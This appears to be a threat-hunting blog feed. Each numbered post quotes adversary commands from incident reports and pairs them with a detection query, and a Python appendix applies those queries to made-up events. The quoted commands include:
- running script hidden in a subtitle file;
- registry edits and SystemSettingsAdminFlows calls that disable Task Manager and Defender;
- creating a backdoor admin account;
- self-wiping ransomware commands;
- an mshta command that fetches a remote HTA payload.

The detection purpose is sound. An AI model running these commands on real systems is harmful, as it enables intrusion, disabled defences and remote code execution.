Posts

348. Adversaries Hide Malicious Scripts Inside Subtitle Files

Hello everyone! Adversaries may hide malicious content anywhere, including in absolutely legitimate files, so today we'll look at the following technique: Obfuscated Files or Information: Steganography (T1027.003). In some cases threat actors use quite common malware, but still apply some interesting techniques. Just like in this case. The adversary leveraged malicious LNK files to run a command that extracts and executes a malicious script from a subtitle file:

cmd.exe /c type Part2.subtitles.srt | more | findstr /n "^" | findstr "100: 101: 102: 103:" | for /f "tokens=1,* delims=:" %a in ('more') do cmd /c %b

Interesting, right? The first findstr prefixes every line of the .srt file with its line number, the second keeps only lines 100 to 103, and the for loop strips the number prefix and runs each remaining line as a command. We can hunt for similar activity:

event_type: "processcreatewin" AND proc_file_path: "cmd.exe" AND cmdline: ("type" AND "findstr" AND *.srt)

See you tomorrow!

347. Adversaries Modify Registry to Inhibit System Recovery and Analysis

Hello everyone! We talked about Modify Registry (T1112) a few times already, but I spotted a few more interesting procedures, so let's have a look. Our example for today is VolkLocker. It has a few interesting behaviors related to registry modification. It disables Task Manager:

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

Disables Registry Editor:

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f

Disables Windows Command Shell:

reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windo...

346. Hunting for Suspicious User Accounts

Hello everyone! Adversaries often use compromised credentials, but in some cases they create new accounts. And in some cases those accounts are quite unique, so we can use them for detection and hunting. As always, we need some examples. Let's look into this report. The adversary created new administrator accounts with the following names: backupadmin, admin_gpo and lapsadmin1. For example:

cmd.exe /c net user backupadmin abcd1234

Suspicious user creation events may be great targets for hunting, so make sure you document them not only for attribution and clustering, but also for detection:

event_type: "usercreatewin" AND usr_tgt_name: ("backupadmin" OR "admin_gpo" OR "lapsadmin1")

See you tomorrow!

345. That's How Adversaries Remove Indicators from Compromised Systems

Hello everyone! In many cases adversaries remove artifacts from compromised systems, so today we'll look at a few examples of Indicator Removal: File Deletion (T1070.004). Our example for today is 01flip ransomware. It has both Windows and Linux variants. The Windows variant removes itself using the following command:

ping 127.0.0.7 -n 5 > Nul & fsutil file setZeroData offset=0 length=4194303 ${self_name} > Nul & Del /f /q ${self_name}

As you can see, it abuses fsutil to overwrite the file with zeros before deleting it. We can look for similar activity:

event_type: "processcreatewin" AND proc_file_path: "fsutil.exe" AND cmdline: ("file" AND "setzerodata")

The Linux variant runs the following command:

sleep 5 && dd if=/dev/urandom of=${self_name} bs=1M count=4 > /dev/null 2>&1 && rm ${self_name} > /dev/null 2>&1

Here the adversary abuses dd, and it's another hunting opportunity:

event_type: "processcreatenix" AND p...

344. Adversaries Added Another Forensic Tool to Their Arsenal

Hello everyone! We talked about it a few times already, but I've spotted another forensic tool in an adversary's arsenal today. And yes, it's another example of how threat actors can obtain an LSASS dump. This time, according to this post, they used MemProcFS to mount a dump of a compromised system's memory:

memprocfs.exe -device dump.dmp

If you are not doing incident response, for example, MemProcFS execution is quite a suspicious event, so it's worth a query:

event_type: "processcreatewin" AND proc_file_originalfilename: "memprocfs.exe"

See you tomorrow!

343. Ransomware Gangs Abuse SystemSettingsAdminFlows to Evade Defenses

Hello everyone! Today we'll look at another example of how adversaries abuse legitimate Windows executables to evade defenses. This time it's SystemSettingsAdminFlows.exe. According to this report, DeadLock leveraged this utility to disable various features of Windows Defender:

SystemSettingsAdminFlows.exe Defender RTP 1
SystemSettingsAdminFlows.exe Defender SpynetReporting 0
SystemSettingsAdminFlows.exe Defender SubmitSamplesConsent 0
SystemSettingsAdminFlows.exe Defender DisableEnhancedNotifications 1

The commands disable Real-Time Protection (RTP) and cloud-based protection, stop the machine from sending threat reports to Microsoft, and prevent Windows Defender from automatically submitting suspicious files for analysis. Worth a query, isn't it?

event_type: "processcreatewin" AND proc_file_path: "systemsettingsadminflows.exe" AND cmdline: "defender"

See you tomorrow!

342. Mshta - A Great Target for Hunting

Hello everyone! It's Monday, so let's look at a classic (at least in my opinion) target for threat hunting: System Binary Proxy Execution: Mshta (T1218.005). I've spotted it again looking through the report on an activity cluster we track as Lone Wolf. The adversary leveraged malicious LNK files to deploy a Cobalt Strike beacon. The LNK, for example, runs the following command:

powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'hxxps://iplogger[.]cn/forensicsas.png'"

As you can see, here mshta.exe is used to access a link, which redirects to a malicious HTA file. So, for example, we can search for mshta.exe accessing suspicious links:

event_type: "processcreatewin" AND proc_file_path: "mshta.exe" AND cmdline: *http*

See you tomorrow!
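The hunting queries from posts 348, 345, 343 and 342 above, implemented as an added example (not code from the original posts) as a small Python filter over constructed process-creation events. Field names follow the queries; every sample path, host and command line is made up, and the hunt names are assumed.

```python
import re
# Constructed process-creation events shaped like the fields the posts' queries use
# (event_type, proc_file_path, cmdline). Every value below is made up for this example.
EVENTS = [
    {"event_type": "processcreatewin", "proc_file_path": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c type Part2.subtitles.srt | more | findstr /n "^" | findstr '
                '"100: 101: 102: 103:" | for /f "tokens=1,* delims=:" %a in (\'more\') do cmd /c %b'},
    {"event_type": "processcreatewin", "proc_file_path": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c type readme.txt"},                       # benign: no findstr, no .srt
    {"event_type": "processcreatewin", "proc_file_path": r"C:\Windows\System32\fsutil.exe",
     "cmdline": r"fsutil file setZeroData offset=0 length=4194303 C:\Users\Public\enc.exe"},
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\ImmersiveControlPanel\SystemSettingsAdminFlows.exe",
     "cmdline": "SystemSettingsAdminFlows.exe Defender RTP 1"},
    {"event_type": "processcreatewin", "proc_file_path": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/forensicsas.png"},    # placeholder host
    {"event_type": "processcreatewin", "proc_file_path": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Windows\Temp\setup.hta"},             # local HTA: no URL, not flagged
]

def tok(word):
    # Whole-word, case-insensitive match, roughly how a quoted term in the queries behaves
    return re.compile(r"\b" + re.escape(word) + r"\b", re.I)

# (hunt name, expected image basename, predicate on the command line), one per query on the page
HUNTS = [
    ("srt_script_extraction", "cmd.exe",
     lambda c: tok("type").search(c) and tok("findstr").search(c) and re.search(r"\S+\.srt\b", c, re.I)),
    ("fsutil_zero_wipe", "fsutil.exe", lambda c: tok("file").search(c) and tok("setzerodata").search(c)),
    ("defender_adminflows", "systemsettingsadminflows.exe", lambda c: tok("defender").search(c)),
    ("mshta_remote_url", "mshta.exe", lambda c: "http" in c.lower()),   # the query's *http* wildcard
]

def run_hunts(events):
    """Return {hunt name: [matching command lines]} over Windows process-creation events."""
    hits = {name: [] for name, _, _ in HUNTS}
    for ev in events:
        if ev.get("event_type") != "processcreatewin":
            continue
        image = ev.get("proc_file_path", "").rsplit("\\", 1)[-1].lower()   # basename, as the queries match it
        cmd = ev.get("cmdline", "")
        for name, want_image, pred in HUNTS:
            if image == want_image and pred(cmd):
                hits[name].append(cmd)
    return hits

if __name__ == "__main__":
    for name, cmds in run_hunts(EVENTS).items():
        print(f"{name}: {len(cmds)} hit(s)", *cmds, sep="\n    ")
```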